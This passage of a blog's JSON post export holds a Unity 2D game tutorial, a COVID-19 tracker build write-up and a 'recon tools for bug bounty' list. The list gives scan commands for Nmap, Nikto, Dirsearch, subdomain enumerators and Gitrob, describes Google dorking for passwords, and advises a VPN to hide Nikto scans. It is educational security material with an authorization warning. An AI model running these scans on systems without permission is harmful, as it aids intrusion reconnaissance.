src=\"https://www.youtube.com/embed/Cm78Do9VO8s\" frameborder=\"0\" allowfullscreen=\"\"></iframe></div></div></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><div style=\"\"><b style=\"\"><font size=\"5\">How to built a 2D platformer game using Unity3d?</font></b></div><div style=\"font-size: large;\"><br></div><div style=\"font-size: large;\">Unity3d game engine is a great platform to build a 2D or 3D game because it provides many major components such as physics, animation, cross-platform support and many more. And before starting to build any types of game the very first thing you need to do is design a Game Theory which means you need to build the idea behind the game which will help you to develop a successful game and always try to remember while designing a Game theory make it simpler and don't make it complicated otherwise it will be quite difficult for you to finish the game.</div><div style=\"font-size: large;\"><br></div><div style=\"font-size: large;\">If we see an example of a legendary <a href=\"http://www.trex-game.skipser.com/\"><font color=\"#dd4124\"><b>T-Rex Game</b></font></a> which you often play on Google chrome browser when you don't have an internet connection and this game is the best example of a 2D platformer game and if you look at the game then you noticed the game is very simple and easy to play all you need to do is press the SPACE bar on the keyboard to avoid the obstacles and earn points.</div><div style=\"font-size: large;\"><br></div><div style=\"font-size: large;\">The similar approach I also follow while designing this game at the very beginning my goal was to build a simple 2D platformer game so that any types of user can play and have fun and also it should help me while building this game. And my game theory is there is a king who hunts for the treasure and during his mission, he will face many enemies and there will be a 3 minutes time limit to complete the game.</div><div style=\"font-size: large;\"><br></div><div style=\"font-size: large;\">And that's all the theory behind my game and you should also follow a similar approach while building your game.</div><div style=\"font-size: large;\"><br></div><div style=\"font-size: large;\">So now let's discuss what are the tools and techniques behind Forest Assassin game?</div></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><div style=\"\"><b style=\"\"><font size=\"5\">Tools &amp; Techniques</font></b></div><div style=\"font-size: large;\"><br></div><div style=\"font-size: large;\">In every 2D platformer game, there are many components which we need to build to finish the game and these components are the major elements of every platformer game.</div><div style=\"font-size: large;\"><br></div><div style=\"font-size: large;\"><ul><li>Character Movement</li><li>Character Death</li><li>Character attack</li><li>Score Counter</li><li>Timer</li></ul></div><div style=\"font-size: large;\"><br></div><div style=\"font-size: large;\">So now let's discuss how I have implemented all of these components into my game one by one.</div><div style=\"font-size: large;\"><br></div><div style=\"\"><div style=\"\"><b style=\"\"><font size=\"5\">Character Movement</font></b></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">To move a character in the game you need to have a script which will control the character to Walk, Jump, Crawl and so on and also it requires physics.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">To control the physics Unity provides a component called <a href=\"https://docs.unity3d.com/ScriptReference/Rigidbody.html\"><font color=\"#dd4124\"><b>Rigidbody</b></font></a> which handles lots of fundamental physics like force and acceleration and this component you can use with anything which you want to interact with the physics.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">At last, it requires a floor where the character can able to walk in Unity it's called Collider component and there are many different types of collider are available such as Box Collider, Circle Collider, etc.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">When you have all of these elements in place then you can able to move your character.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><b style=\"\"><font size=\"5\">Character Death - (Game Over)</font></b></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">In this game, the character can only die when he touches with the enemy or with the water and to handle the trigger between the collider Unity has an API called <a href=\"https://docs.unity3d.com/ScriptReference/MonoBehaviour.OnTriggerEnter2D.html\"><font color=\"#dd4124\"><b>OnTriggerEnter2D(Collider2D trigger)</b></font></a> which will handle the trigger between the collider and after the collider, it will send a message to the Collider2D parameter which we can use to decide the death of our character.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">And to make it organize&nbsp;I have assign tag name called 'Enemy' so that in future if I will add one more enemy then all I need to do is assign this tag name to this component and it will be handled through the Script.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><b style=\"\"><font size=\"5\">Character attack</font></b></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">Character attack is the most crucial element in every game because this is how you win the game and while building this component the two things you need to understand first is the animation and second is the attack script.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">To make the <a href=\"https://docs.unity3d.com/Manual/AnimationSection.html\"><font color=\"#dd4124\"><b>animation</b></font></a> in 2D first you need to gather all the <a href=\"https://docs.unity3d.com/Manual/Sprites.html\"><font color=\"#dd4124\"><b>sprites</b></font></a> and add it to the animation component and create your animation and later you can use it through the script.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">While writing the attack script a few things we need to know such as Attack range and attack point because it's quite important that from which position the character will set his attack vector and in this game Sword is our attack vector, so when the character uses his sword to attack the enemy then we need to know the range and the point of the attack so that we can successfully launch our attack.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">To calculate the attack range and point Unity has an API called <a href=\"https://docs.unity3d.com/ScriptReference/Physics2D.OverlapCircleAll.html\"><font color=\"#dd4124\"><b>Physics2D.OverlapCircleAll</b></font></a> it will return a list of colliders which falls with the circular area and when we get all the colliders then all we need to do is start a loop and within the loop destroy the enemy game object.&nbsp;</font><span style=\"font-size: large;\">And to give more clarity to our attack I have created a blood </span><a href=\"https://docs.unity3d.com/ScriptReference/ParticleSystem.html\" style=\"font-size: large;\"><font color=\"#dd4124\"><b>particle system</b></font></a><span style=\"font-size: large;\"> which will appear on every enemy death.</span></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><b style=\"\"><font size=\"5\">Score Counter</font></b></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">If you understood the above two techniques (Character Death &amp; Character Attack) then to implement the scoring functionality it's quite easy as we need to follow a similar approach. When the character and the gold coins collide with each other then I am calculating the score to +10 through the script and again here also I am using <a href=\"https://docs.unity3d.com/ScriptReference/MonoBehaviour.OnTriggerEnter2D.html\"><font color=\"#dd4124\"><b>OnTriggerEnter2D(Collider2D trigger)</b></font></a> API.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">To display the score on the game I have used <a href=\"https://docs.unity3d.com/2018.3/Documentation/ScriptReference/UI.Text.html\"><font color=\"#dd4124\"><b>Text UI</b></font></a> component which comes under <a href=\"https://docs.unity3d.com/Packages/com.unity.ugui@1.0/api/UnityEngine.UI.html\"><font color=\"#dd4124\"><b>UnityEngine.UI</b></font></a>.&nbsp;</font><span style=\"font-size: large;\">And the same scoring variable is being used in all three components (You Win, Game Over &amp; Time's Up).</span></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><b style=\"\"><font size=\"5\">Timer</font></b></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">To implement the timer functionality Unity has an API called <a href=\"https://docs.unity3d.com/ScriptReference/MonoBehaviour.StartCoroutine.html\"><font color=\"#dd4124\"><b>StartCoroutine</b></font></a> which is used to create a parallel action and can pause the current execution and then continue where it left off and all the coroutine function is declared with a return type of IEnumerator with the yield return statement.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">In this game, I have set the timer to 3 minutes and when the game starts immediately it will start the coroutine function and calculates the timer and when the timer reaches zero it will call <a href=\"https://docs.unity3d.com/ScriptReference/MonoBehaviour.StopCoroutine.html\"><font color=\"#dd4124\"><b>StopCoroutine</b></font></a> function.&nbsp;</font><span style=\"font-size: large;\">And again I have used Text UI component to display the time on the game.</span></div><div style=\"\"><br></div><div style=\"\"><b style=\"\"><font size=\"5\">How to publish for WebGL?</font></b></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">Unity has WebGL build option which allows publishing content as JavaScript&nbsp;programs and internally it uses HTML5/JavaScript, WebAssembly, WebGL rendering.&nbsp;</font><span style=\"font-size: large;\">In today's modern web browsers by default enables WebGL and it's quite helpful to run Unity WebGL application on the browsers.&nbsp;</span><span style=\"font-size: large;\">To run a WebGL application we need to run through a local server and in this game, I have Node.js as my server but you can also use any other scripting languages.</span></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><b style=\"\"><font size=\"5\">Open Source</font></b></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">I have made the complete development open-source on my <a href=\"https://github.com/anshumanpattnaik/unity-2d-forest-assassin-game\"><font color=\"#dd4124\"><b>GitHub</b></font></a>&nbsp;so that you will have a clear understanding of every component of this game and also I hope it will give you an idea to build your own game.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">So this is the overall explanation of Forest Assassin game, I hope you understood the tools and techniques behind this game if you find any issues then please feel free to raise an issue on <a href=\"https://github.com/anshumanpattnaik/unity-2d-forest-assassin-game\"><font color=\"#dd4124\"><b>GitHub</b></font></a>.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">Enjoy the game and also share this game with your friends.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">Thank you &amp; Happy coding :)</font></div></div></div>",
            "visibility": true,
            "is_featured": false,
            "featured_board": false,
            "featured": ""
        },
        {
            "title": "Coronavirus (COVID-19) - Full Stack Application",
            "blog_id": "covid-19-full-stack-application",
            "author": "Anshuman Pattnaik",
            "published_date": "2020-04-12T19:57:07.063617Z",
            "last_updated_date": "2021-06-06T10:46:59.617516Z",
            "seo_thumbnail": "https://assets.hackbotone.com/assets/covid19-full-stack-application/seo_thumbnail.png",
            "small_thumbnail": "https://assets.hackbotone.com/assets/covid19-full-stack-application/small_thumbnail.png",
            "thumbnail": "https://assets.hackbotone.com/assets/covid19-full-stack-application/large_thumbnail.png",
            "keywords": [
                "react.js",
                "node.js",
                "mongodb"
            ],
            "highlights": "Coronavirus (COVID-19) which is an infectious disease caused by respiratory illness and symptoms like flu, cough, fever, difficulty breathing, on December 31, 2019, the first case was recorded in Wuhan, China and later the virus got spread around the world and as of now, around 1 million+ confirmed cases are being recorded since then.",
            "description": "<font size=\"5\" style=\"\"><b>What is Coronavirus (COVID-19)?</b></font><div><font size=\"5\"><br></font></div><div><div><font size=\"4\">Coronavirus (COVID-19) which is an infectious disease caused by respiratory illness and symptoms like flu, cough, fever, difficulty breathing, on December 31, 2019, the first case was recorded in Wuhan, China and later the virus got spread around the world and as of now, around 1 million+ confirmed cases are being recorded since then.</font></div><div><span style=\"font-size: large;\"><br></span></div><div><span style=\"font-size: large;\">You can protect yourself from this virus by following basic precautions like washing your hand frequently, avoid touching your face, maintaining a distance of (1 meter or 3 feet) between people and most importantly if you are sick then immediately call for medical help at your nearest hospital.</span><br></div></div><div><br></div><div><div class=\"video-responsive\">\n    <iframe width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/dth5jfLDuus\" frameborder=\"0\" allowfullscreen=\"\"></iframe></div></div><div><br></div><div><font size=\"5\"><b>How to build a full-stack application with interactive maps?</b></font><br></div><div><font size=\"5\"><br></font></div><div><div><font size=\"4\">In the current scenario, it's quite important to track the statistics of all the cases around the world constantly and thanks to <a href=\"https://github.com/CSSEGISandData/COVID-19\"><font color=\"#dd4124\">Johns Hopkins University Center for Systems Science and Engineering (JHU CSSE)</font></a> for providing the data to the public user, the data are quite well organized and sorted in very well manner and they are updating their repository every day.</font></div><div><span style=\"font-size: large;\"><br></span></div><div><span style=\"font-size: large;\">So as I have collected the data now I have decided to build a <a href=\"https://covid19.hackbotone.com/\"><font color=\"#dd4124\">full-stack application</font></a> with interactive maps so that it will be quite easier for the user to track the cases across the globe.</span><br></div></div><div><span style=\"font-size: large;\"><br></span></div><div><font size=\"5\"><b>Node.js Backend Services</b></font><br></div><div><font size=\"5\"><br></font></div><div><div><font size=\"4\"><a href=\"https://github.com/CSSEGISandData/COVID-19\"><font color=\"#dd4124\">JHU CSSE</font></a> maintains the data in CSV format in their repository and I need to convert the CSV data to JSON format so that it will be quite easier for the front-end framework to populate the data in an efficient way. So to convert CSV to JSON I have use <a href=\"https://www.npmjs.com/package/csv-parser\"><font color=\"#dd4124\">csv-parser</font></a> npm module which is a very popular CSV parser and converts CSV into JSON at a rate of around 90,000 rows per second.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">And after parsing the data I have stored the data into MongoDB so that it won't parse the data every time, it will only parse the data when new data will be available.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">JHU CSSE updates the data once a day around 23:59 (UTC) and to synchronize the data in my server I am using <a href=\"https://www.npmjs.com/package/node-cron\"><font color=\"#dd4124\">node-cron</font></a> npm modules which is a task scheduler and once you register a task with the given time then it will run in the background and triggers when it reaches to the scheduled time.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">And in my case, the scheduled time is 23 hours 59 minutes and when it reaches the time then it will update the data into my server.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Now after parsing the data next big challenge is to populate all the coordinates on the map because on the map if I traditionally populate the coordinates then the application will be much slower, so the solution to this problem is <a href=\"https://geojson.org/\"><font color=\"#dd4124\">GeoJSON</font></a> which is an open standard format for representing geographical features as a point, line strings, polygons and etc and this format is based on JavaScript&nbsp;Object Notation and most importantly all the maps platform such as <a href=\"https://developers.google.com/maps/documentation\"><font color=\"#dd4124\">GoogleMap</font></a>, <a href=\"https://www.mapbox.com/\"><font color=\"#dd4124\">Mapbox</font></a> and many others supports GeoJSON format.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">So I have design one endpoint as <a href=\"https://covid19-api.hackbotone.com/markers.geojson\" style=\"\"><font color=\"#dd4124\">/markers.geojson</font></a> which takes the input from the <a href=\"https://www.mongodb.com/\" style=\"\"><font color=\"#dd4124\">MongoDB</font></a> and prepares all the coordinates into GeoJSON format, so the front-end framework can call this end-point while doing the map implementation.</font></div></div><div><font size=\"5\"><br></font></div><div><font size=\"5\" style=\"\"><b>React.js Frontend Services</b><br></font></div><div><font size=\"5\" style=\"\"><br></font></div><div><div><font size=\"4\">I have chosen <a href=\"https://reactjs.org/\"><font color=\"#dd4124\">react.js</font></a> as my front-end framework for this application and to maintain the application state I have also implemented <a href=\"https://redux.js.org/\"><font color=\"#dd4124\">redux</font></a> which is a very popular JavaScript&nbsp;library for managing application state and both of these frameworks are quite efficient and easy to implement.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">To populate the coordinates on the map I&nbsp;have implemented Mapbox which is quite similar to GoogleMap but the major advantage of <a href=\"https://www.mapbox.com/\"><font color=\"#dd4124\">Mapbox</font></a> is it's free and provides many better functionalities such as Custom maps, Clustering and etc.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">As I have already mentioned that Mapbox also supports GeoJSON format so to populate GeoJSON data over the map, Mapbox has a technique called <a href=\"https://docs.mapbox.com/help/glossary/source-layer/\"><font color=\"#dd4124\">Source-Layer</font></a> which is an individual layer of data within a vector source and <a href=\"https://docs.mapbox.com/mapbox-gl-js/style-spec/sources/\"><font color=\"#dd4124\">Sources</font></a> defines which type of data map should display and in this application data type is 'geojson' and after defining the data <a href=\"https://docs.mapbox.com/mapbox-gl-js/style-spec/layers/\"><font color=\"#dd4124\">Layers</font></a> refers to the source for visual representation and styling of the map. And in this way, I have populated all the coordinates on the map.</font></div></div><div><font size=\"5\" style=\"\"><br></font></div><div><font size=\"5\" style=\"\"><b>Open Source</b><br></font></div><div><font size=\"5\" style=\"\"><br></font></div><div><div><font size=\"4\">It will be quite difficult for me to walk you through step-by-step every lines of codes. That's why I made the complete development open-source on my GitHub. So that you can also build similar types of application by following this repository.</font></div><div><font size=\"4\"><br></font></div><div><ul><li><font size=\"4\">Github Link:- <a href=\"https://github.com/anshumanpattnaik/covid19-full-stack-application\"><font color=\"#dd4124\">covid19-full-stack-application</font></a></font></li><li><span style=\"font-size: large;\">Website Link:- <a href=\"https://covid19.hackbotone.com/\"><font color=\"#dd4124\">https://covid19.hackbotone.com/</font></a></span></li></ul></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">So this is the overall explanation of this website, I hope you guys understood the tools and techniques behind this application if you find any types of issues like on improving codes then please feel free raise an issue on GitHub&nbsp;or else you can reach out to me on <a href=\"https://twitter.com/anspattnaik\"><font color=\"#dd4124\">twitter</font></a> I'll be happy to answer your questions.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Please stay safe and stay well, I want to mention it again to protect yourself from this virus wear mask, wash your hand frequently and take necessary precautions if you get sick.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Thank you &amp; Happy coding :)</font></div></div>",
            "visibility": true,
            "is_featured": true,
            "featured_board": true,
            "featured": "<div><font face=\"Lora, serif\" size=\"4\">The project work was highly appreciated by developer communities and got more than <a href=\"https://github.com/anshumanpattnaik/covid19-full-stack-application/stargazers\"><font color=\"#dd4124\">250+ GitHub stars</font></a> and also once featured on the JavaScript Trending board.</font></div><div><font face=\"Lora, serif\" size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/github_achievement/Github%20Trending.PNG\"><font face=\"Lora, serif\" size=\"4\"><br></font></div><div><font face=\"Lora, serif\" size=\"4\"><br></font></div><div><font face=\"Lora, serif\" size=\"4\">I would like to thank everyone for appreciating my work.</font></div>"
        },
        {
            "title": "10 Recon Tools For Bug Bounty",
            "blog_id": "10-recon-tools-for-bug-bounty",
            "author": "Anshuman Pattnaik",
            "published_date": "2020-01-16T19:56:58.939409Z",
            "last_updated_date": "2021-07-28T17:08:48.055636Z",
            "seo_thumbnail": "https://assets.hackbotone.com/assets/top-10-recon-tools-for-bug-bounty/seo_thumbnail.png",
            "small_thumbnail": "https://assets.hackbotone.com/assets/top-10-recon-tools-for-bug-bounty/small_thumbnail.png",
            "thumbnail": "https://assets.hackbotone.com/assets/top-10-recon-tools-for-bug-bounty/large_thumbnail.png",
            "keywords": [
                "recon",
                "Bug Bounty",
                "Ethical Hacking"
            ],
            "highlights": "Information Gathering is the most important stage of every penetration testing so that you will have a better understanding about your target to exploit vulnerabilities and information like (IP addresses, Subdomain, Open ports and etc.) but to gather information you need proper reconnaissance tools and there are many recon tools which are available on Github but among them, I found Top 10 Recons tools which you can use to gather all of this information about your target.",
            "description": "<b><font size=\"5\">10 Recon Tools for Bug Bounty</font></b><div><b><font size=\"5\"><br></font></b></div><div><font size=\"4\">Information Gathering is the most important stage of every penetration testing so that you will have a better understanding about your target to exploit vulnerabilities and information like (IP addresses, Subdomain, Open ports and etc.) but to gather information you need proper reconnaissance tools and there are many recon tools which are available on Github but among them, I found Top 10 Recons tools which you can use to gather all of this information about your target.</font><br></div><div><font size=\"4\"><br></font></div><div><b style=\"\"><font size=\"5\">Important Note</font></b><br></div><div><b style=\"\"><font size=\"5\"><br></font></b></div><div><font size=\"4\">Always remember before scanning your target you should have proper authorization otherwise you should never use these tools to scan any other targets because while scanning the targets WAF (Web Application Firewall) monitors your network traffic and tracks your IP address and without authorization if you scan a target, you will violate the legal disclaimer of the application and you could face legal actions.</font><br></div><div><font size=\"4\"><br></font></div><div><b style=\"\"><font size=\"5\">1. Nmap</font></b><br></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Nmap is a network mapper tool and widely popular for discovering hosts and services on a network and it's free and open-source on GitHub. It has many features and after scanning a network you can gather a lot of important information such as Host Discovery, Service/Version Detection and OS Detection. This tool is very useful and you can use all of this information to audit a network.</font><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">nmap <span class=\"token operator\">-</span>v <span class=\"token operator\">-</span><span class=\"token constant\">A</span> scanme<span class=\"token punctuation\">.</span><span class=\"token property-access\">nmap</span><span class=\"token punctuation\">.</span><span class=\"token property-access\">org</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><font size=\"4\"><b>For more information -</b> <a href=\"https://nmap.org/\"><font color=\"#dd4124\"><b>https://nmap.org/</b></font></a></font><br></div><div><br></div><div><b><font size=\"5\">2. Nikto</font></b><br></div><div><br></div><div><div><font size=\"4\">Nikto is widely popular for vulnerability scanner and it scans web servers to detect dangerous files, outdated server software and many more, it performs specific server type checks like (Clickjacking, MIME Type, etc.) and this tool you can scan with any web servers such as Apache, NGINX, Oracle HTTP Server, etc. This tool is quite useful to detect server misconfigurations. But the major issue of using this tool is that it's quite easily detectable so always while scanning a network using Nikto it's better to use a VPN (Virtual Private Network).</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">This tool is open-source on GitHub&nbsp;and you can install this tool with all major Operating System - (Windows, MacOS&nbsp;&amp; GNU/Linux).</font></div></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">nikto <span class=\"token operator\">-</span>h example<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><b style=\"font-size: large;\">For more information -&nbsp; </b><u style=\"color: rgb(221, 65, 36); font-size: large;\"><a href=\"https://cirt.net/Nikto2\"><font color=\"#dd4124\"><b>https://cirt.net/Nikto2</b></font></a></u></div><div><br></div><div><b><font size=\"5\">3. Amass</font></b><br></div><div><span style=\"font-size: large;\"><br></span></div><div><span style=\"font-size: large;\">Amass tool is developed and maintained by <a href=\"https://www2.owasp.org/\"><font color=\"#dd4124\"><b>OWASP</b></font></a>&nbsp;and this tool is used to gather information such as DNS enumeration, Subdomain name alterations, Web scraping, Certificates, Web APIs and many more. This tool is developed to help security researchers to get in-depth information about a target network.</span></div><div><span style=\"font-size: large;\"><br></span></div><div><ul><li><font size=\"4\"><b>DNS:</b> Basic enumeration, Brute forcing (optional), Reverse DNS sweeping, Subdomain name alterations/permutations, Zone transfers (optional)</font></li><li><font size=\"4\"><b>Scraping:</b> Ask, Baidu, Bing, DNSDumpster, DNSTable, Dogpile, Exalead, Google, HackerOne, IPv4Info, Netcraft, PTRArchive, Riddler, SiteDossier, ViewDNS, Yahoo<br></font></li><li><font size=\"4\"><b>Certificates</b>: Active pulls (optional), Censys, CertSpotter, Crtsh, Entrust, GoogleCT<br></font></li><li><font size=\"4\"><b>APIs:</b> AlienVault, BinaryEdge, BufferOver, CIRCL, CommonCrawl, DNSDB, GitHub, HackerTarget, IPToASN, Mnemonic, NetworksDB, PassiveTotal, Pastebin, RADb, Robtex, SecurityTrails, ShadowServer, Shodan, Spyse (CertDB &amp; FindSubdomains), Sublist3rAPI, TeamCymru, ThreatCrowd, Twitter, Umbrella, URLScan, VirusTotal, WhoisXML<br></font></li><li><font size=\"4\"><b>Web Archives:</b> ArchiveIt, ArchiveToday, Arquivo, LoCArchive, OpenUKArchive, UKGovArchive, Wayback<br></font></li></ul><div><br></div></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">amass <span class=\"token operator\">-</span>d example<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><font size=\"4\"><b>For more information -</b> <a href=\"https://github.com/OWASP/Amass\"><font color=\"#dd4124\"><b>https://github.com/OWASP/Amass</b></font></a></font><br></div><div><br></div><div><b><font size=\"5\">4. Dirsearch</font></b><br></div><div><br></div><div><font size=\"4\">Dirsearch is a free and open-source tool and widely popular for brute force directories and files in websites. This tool has many different features such as Multithreaded, Keep alive connections, multiple extensions, exporting reports in both (plain text, JSON), HTTP proxy support, User-agent randomization and many more. And you can use custom wordlist like SecList to brute-force files and directories. This tool is quite friendly and easy to use and it's supported for three major Operating systems (Windows, MacOS&nbsp;&amp; GNU/Linux).</font></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">python dirsearch<span class=\"token punctuation\">.</span><span class=\"token property-access\">py</span> <span class=\"token operator\">-</span>u https<span class=\"token operator\">:</span><span class=\"token operator\">/</span><span class=\"token operator\">/</span>example<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span> <span class=\"token operator\">-</span>e html<span class=\"token punctuation\">,</span>php<span class=\"token punctuation\">,</span>jsp<span class=\"token punctuation\">,</span>asp<span class=\"token punctuation\">,</span>json</code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><b><font size=\"5\">5. Sublist3r</font></b><br></div><div><br></div><div><font size=\"4\">Sublist3r is widely popular to enumerate subdomains of a website and to gather subdomain it uses many popular search engines such as Google, Yahoo, Bing, Baidu and Ask and to enumerate subdomains it uses Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS. This tool is very much helpful to gather subdomains of a domain and most importantly to get better results of subdomains, <a href=\"https://github.com/TheRook/subbrute\"><font color=\"#dd4124\"><b>subbrute</b></font></a> was integrated with Sublist3r by using an improved wordlist.</font><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">python sublist3r<span class=\"token punctuation\">.</span><span class=\"token property-access\">py</span> <span class=\"token operator\">-</span>d example<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><font size=\"4\"><b>Sublist3r GitHub&nbsp;repo -</b> <a href=\"https://github.com/aboul3la/Sublist3r\"><font color=\"#dd4124\"><b>https://github.com/aboul3la/Sublist3r</b></font></a></font><br></div><div><br></div><div><b><font size=\"5\">6. Knockpy</font></b><br></div><div><br></div><div><font size=\"4\">Knockpy is designed to enumerate subdomain and to scan DNS zone transfer and automatically try to bypass wildcard DNS record. And most importantly it supports queries to VirusTotal subdomains and to configure in the config.json file you can set up your API_KEY. This tool most of the penetration testers and bug hunters uses to exploit Subdomain takeover vulnerability.</font></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">knockpy example<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><font size=\"4\"><b>Knockpy GitHub&nbsp;repo -</b> <a href=\"https://github.com/guelfoweb/knock\"><font color=\"#dd4124\"><b>https://github.com/guelfoweb/knock</b></font></a></font><br></div><div><br></div><div><b><font size=\"5\">7. Gitrob</font></b><br></div><div><br></div><div><font size=\"4\">Gitrob tool is widely popular to find sensitive files on public Github repositories and this tool will clone user or organizations public repositories and in-depth iterate all the commit history and it matches with the potentially sensitive files such as api_key, access_token, password, database_name, etc.<br></font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">To install this tool you need to have Golang set up in your local machine. To install this tool you need to have <a href=\"https://golang.org/\"><font color=\"#dd4124\"><b>Golang</b></font></a> set up in your local machine.</font><br></div><div><font size=\"4\"><br></font></div><div><font size=\"4\"><b>Gitrob Github repo -</b> <a href=\"https://github.com/michenriksen/gitrob\"><font color=\"#dd4124\"><b>https://github.com/michenriksen/gitrob</b></font></a></font><br></div><div><font size=\"4\"><br></font></div><div><b><font size=\"5\">8. Google Dork</font></b><br></div><div><b><font size=\"5\"><br></font></b></div><div><font style=\"\"><font size=\"4\">Google Dork is also named as \"Google Hacking\" and this is a technique to find security holes in a website through Google search. It's so much helpful for the security researchers and using Google's web-crawling you can gather information such as usernames, passwords and sensitive information.</font><br></font></div><div><font style=\"\"><font size=\"4\"><br></font></font></div><div><font style=\"\"><font size=\"4\"><b>Google Dork Operators</b><br></font></font></div><div><font style=\"\"><font size=\"4\"><b><br></b></font></font></div><div><font style=\"\"><table cellpadding=\"0\" cellspacing=\"0\" class=\"blog_table\" style=\"font-family: &quot;Open Sans&quot;, sans-serif; font-size: 13.3333px;\"><tbody style=\"box-sizing: border-box;\"><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_bold\" style=\"box-sizing: border-box; font-weight: 700; line-height: 1.7em; color: rgb(59, 58, 58);\"><font face=\"Lora, serif\" style=\"\" size=\"4\">Operators</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_bold\" style=\"box-sizing: border-box; font-weight: 700; line-height: 1.7em; color: rgb(59, 58, 58);\"><font face=\"Lora, serif\" size=\"4\">Purpose</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_bold\" style=\"box-sizing: border-box; font-weight: 700; line-height: 1.7em; color: rgb(59, 58, 58);\"><font face=\"Lora, serif\" size=\"4\">Example</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">intitle</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Search Page Title</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); 